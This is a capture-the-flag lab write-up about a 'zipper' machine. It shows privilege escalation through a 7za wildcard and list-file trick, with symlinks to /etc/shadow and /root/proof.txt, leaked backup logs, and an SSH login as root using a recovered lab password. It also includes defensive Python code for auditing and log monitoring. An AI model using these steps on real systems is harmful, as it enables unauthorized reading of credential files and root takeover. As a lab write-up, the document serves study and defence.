7z(7za) Wildcard Exploit


In 7z (7za), the shell wildcard character, *, can be abused to cause an arbitrary file read by placing crafted files in the working directory. If a root-executed command such as 7za a /backup/$filename.zip -t7z -snl -p$pass -- * is used, creating an empty @root.txt file and a root.txt symlink pointing to a target file enables the attack: the shell expands * into @root.txt, which 7z parses as a reference to a list file (the -- only ends switch parsing; it does not stop @-prefixed arguments from being treated as list files), so 7z follows the symlink and reads the content of the target instead. Since that content is not a valid file list, 7z reports an error and leaks the target file's content in its output.

www-data@zipper:/var/www/html/uploads$ ln -s /etc/shadow pe.zip
www-data@zipper:/var/www/html/uploads$ touch @pe.zip

Because the 7za command only archives files with the .zip extension, that extension has to be used. A symlink named pe.zip pointing to /etc/shadow is created, together with an empty @pe.zip file, so that 7za treats pe.zip as a list file.
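As an added example, not code from the original write-up: a Python script that audits a directory for the @NAME-plus-symlink layout described above and builds a 7za argument list that the trick cannot influence (every file is passed as ./NAME, so no argument begins with @, and symlinks are skipped before 7za sees them). The directory layout, file names and secret content in demo() are constructed for the demonstration; the 7za switches mirror the ones in the write-up's command.

```python
import fnmatch
import os
import tempfile

LISTFILE_PREFIX = "@"  # 7-Zip parses any argument beginning with '@' as a list file


def find_listfile_symlink_pairs(directory):
    """Audit one directory for the layout abused in the write-up.

    Returns (listfile_name, symlink_path, link_target) for every regular file
    named '@NAME' that sits next to a symlink named 'NAME'. When a privileged
    job runs `7za a ... *` here, the shell expands '@NAME' into an argument that
    7za reads as a list file, following the symlink to whatever NAME points at.
    """
    pairs = []
    for entry in sorted(os.listdir(directory)):
        if not entry.startswith(LISTFILE_PREFIX) or len(entry) == 1:
            continue
        sibling = os.path.join(directory, entry[1:])
        if os.path.islink(sibling):
            pairs.append((entry, sibling, os.readlink(sibling)))
    return pairs


def safe_archive_args(directory, pattern, archive):
    """Build an argv for 7za that the '@' + symlink trick cannot influence.

    Assumes the job changes into `directory` before running (as the write-up's
    command does). Two changes versus `7za a ... -- *`:
      * files are passed as './NAME', so no argument can start with '@'
        ('--' ends switch parsing but does not stop list-file handling);
      * symlinks are skipped before 7za ever sees them.
    """
    argv = ["7za", "a", archive, "-t7z", "-snl", "--"]
    for entry in sorted(os.listdir(directory)):
        path = os.path.join(directory, entry)
        if os.path.islink(path) or not os.path.isfile(path):
            continue  # never hand a symlink (or a directory) to the archiver
        if fnmatch.fnmatch(entry, pattern):
            argv.append("./" + entry)
    return argv


def demo():
    """Constructed reproduction of the write-up's directory layout (sample data only)."""
    with tempfile.TemporaryDirectory() as root:
        target = os.path.join(root, "secret.txt")
        with open(target, "w") as fh:
            fh.write("constructed secret, not real data\n")
        uploads = os.path.join(root, "uploads")
        os.mkdir(uploads)
        open(os.path.join(uploads, "legit.zip"), "w").close()
        os.symlink(target, os.path.join(uploads, "pe.zip"))  # symlink named pe.zip
        open(os.path.join(uploads, "@pe.zip"), "w").close()  # empty '@' marker file
        pairs = find_listfile_symlink_pairs(uploads)
        argv = safe_archive_args(uploads, "*.zip", "/backup/example.7z")
    return pairs, argv


if __name__ == "__main__":
    found, argv = demo()
    for listfile, link, dest in found:
        print(f"suspicious: {listfile} next to symlink {link} -> {dest}")
    print("hardened command:", " ".join(argv))
```

Note that the ./@pe.zip marker file still ends up in the hardened argv; that is fine, since it is an empty regular file that 7za will simply archive, whereas a bare @pe.zip argument would be opened as a list file.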

www-data@zipper:/var/www/html/uploads$ cat /opt/backups/backup.log
 
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor                 (A00F11),ASM,AES-NI)
 
Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 3629
 
Scanning the drive:
3 files, 2867 bytes (3 KiB)
 
Updating archive: /opt/backups/backup.zip
 
Items to compress: 3
 
 
Files read from disk: 3
Archive size: 3629 bytes (4 KiB)
Everything is Ok

It appears to have failed, as no error was reported: the content of /etc/shadow is itself a list of entries, so 7za accepted it as a list file instead of complaining.

www-data@zipper:/var/www/html/uploads$ ln -s /root/proof.txt pe.zip

The symlink is changed to point to /root/proof.txt instead.

www-data@zipper:/var/www/html/uploads$ cat /opt/backups/backup.log
 
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor                 (A00F11),ASM,AES-NI)
 
Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 3633
 
Scanning the drive:
3 files, 2889 bytes (3 KiB)
 
Updating archive: /opt/backups/backup.zip
 
Items to compress: 3
 
 
Files read from disk: 3
Archive size: 3633 bytes (4 KiB)
 
Scan WARNINGS for files and folders:
 
8248e94ab886dabea783c8a7828a621a : No more files
----------------
Scan WARNINGS: 1

This time it worked: the warning line leaks the content of /root/proof.txt, 8248e94ab886dabea783c8a7828a621a, because 7za tried to open that string as a filename taken from the list and reported that it did not exist.
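As an added example, not part of the original write-up: a small monitor for the backup.log format shown above. From the defender's side, a "No more files" entry under "Scan WARNINGS" in an unattended backup run means 7za parsed some argument as a list file whose entries do not exist on disk, which is exactly the footprint of this trick; an entry that does not even match the job's own file pattern is the strongest signal. The sample log text below is constructed to match the format in the write-up, with a placeholder in place of leaked content.

```python
import fnmatch
import re

# One warning line per list-file entry 7za could not open.
WARNING_RE = re.compile(r"^(?P<name>.+?) : No more files$")
COUNT_RE = re.compile(r"^Scan WARNINGS: (?P<n>\d+)$", re.MULTILINE)

# Constructed sample: same layout as the write-up's log, placeholder content.
LEAK_LOG = """7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
Open archive: /opt/backups/backup.zip
Scanning the drive:
3 files, 2889 bytes (3 KiB)
Updating archive: /opt/backups/backup.zip
Files read from disk: 3
Archive size: 3633 bytes (4 KiB)

Scan WARNINGS for files and folders:

CONSTRUCTED-LEAKED-LINE : No more files
----------------
Scan WARNINGS: 1
"""

CLEAN_LOG = """7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
Scanning the drive:
3 files, 2867 bytes (3 KiB)
Updating archive: /opt/backups/backup.zip
Files read from disk: 3
Archive size: 3629 bytes (4 KiB)
Everything is Ok
"""


def parse_scan_warnings(log_text):
    """Return the names 7za reported as missing in the 'Scan WARNINGS' section ([] if none)."""
    entries, in_section = [], False
    for line in log_text.splitlines():
        if line.startswith("Scan WARNINGS for files and folders:"):
            in_section = True
            continue
        if not in_section:
            continue
        if line.startswith("----------------"):
            break
        m = WARNING_RE.match(line)
        if m:
            entries.append(m.group("name"))
    return entries


def declared_warning_count(log_text):
    """Read the trailing 'Scan WARNINGS: N' summary line (0 when absent)."""
    m = COUNT_RE.search(log_text)
    return int(m.group("n")) if m else 0


def assess(log_text, pattern="*.zip"):
    """Classify one backup run.

    'clean'                   no warnings at all
    'missing-member'          warnings, but every name looks like a legitimate
                              member of the backup (matches `pattern`)
    'listfile-leak-suspected' at least one warning name does not match the
                              pattern the job archives, i.e. it was read from
                              a list file rather than from the directory
    """
    entries = parse_scan_warnings(log_text)
    if not entries and declared_warning_count(log_text) == 0:
        return "clean", entries
    if all(fnmatch.fnmatch(e, pattern) for e in entries):
        return "missing-member", entries
    return "listfile-leak-suspected", entries


if __name__ == "__main__":
    for name, text in (("clean run", CLEAN_LOG), ("suspicious run", LEAK_LOG)):
        verdict, names = assess(text)
        print(f"{name}: {verdict} {names}")
```

A backup job can run assess() over its own log after each invocation and alert on anything other than "clean"; the "missing-member" class covers a .zip that was removed between the shell glob and the scan, which is worth a ticket but not an incident.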

/root/secret


The content of the /root/secret file had already been revealed and validated during an earlier exploit attempt.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zipper/test]
└─$ sshpass -p WildCardsGoingWild ssh root@$IP
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-90-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
 System information disabled due to load higher than 1.0
 
 
54 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
Last login: Sun Apr  6 15:16:32 2025 from 192.168.45.249
root@zipper:~# whoami
root
root@zipper:~# hostname
zipper
root@zipper:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:95:bf brd ff:ff:ff:ff:ff:ff
    inet 192.168.201.229/24 brd 192.168.201.255 scope global ens160
       valid_lft forever preferred_lft forever

It was the password of the root account. System-level compromise.